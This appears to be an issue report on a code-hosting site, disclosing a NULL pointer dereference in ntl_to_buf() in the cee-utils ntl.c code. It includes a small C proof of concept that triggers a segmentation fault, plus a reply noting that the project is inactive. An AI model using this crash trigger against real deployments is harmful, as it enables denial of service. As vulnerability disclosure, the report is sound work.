NULL Pointer in ntl_to_buf()

[Leeziao]

The NULL Pointer vulnerability happens in ntl_to_buf(), cee-utils/ntl.c
How the vulnerabilitiy happens:

1. ntl_to_buf() is invoked with buf is NULL, the first element of p is NULL
2. The NULL variable buf gets dereferenced at *buf = '\0';

---

Steps to reproduce:

1. Compile following file (poc.c)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "ntl.h"

size_t serialize_element(char *buf, size_t size, void *element) {
    if (!element) {
        const char *null_str = "null";
        if (buf) snprintf(buf, size, "%s", null_str);
        return strlen(null_str);
    }

    int *val = (int*)element;
    return snprintf(buf, size, "%d", *val);
}

int main(void) {
    ntl_t p = ntl_calloc(3, sizeof(int));

    struct ntl_str_delimiter delim = {
        .start_delimiter = '[',
        .element_delimiter = ", ",
        .last_element_delimiter = "",
        .end_delimiter = ']',
        .null_ntl = "[]"
    };

    char *result = NULL;
    ntl_to_abuf(&result, p, &delim, serialize_element);
}

2. Compile and Run

$ gcc poc.c -o poc -L. -lreddit
$ ./poc
zsh: segmentation fault (core dumped)  ./poc

[tokisuno]

last commit was 4 years ago with no other activity :/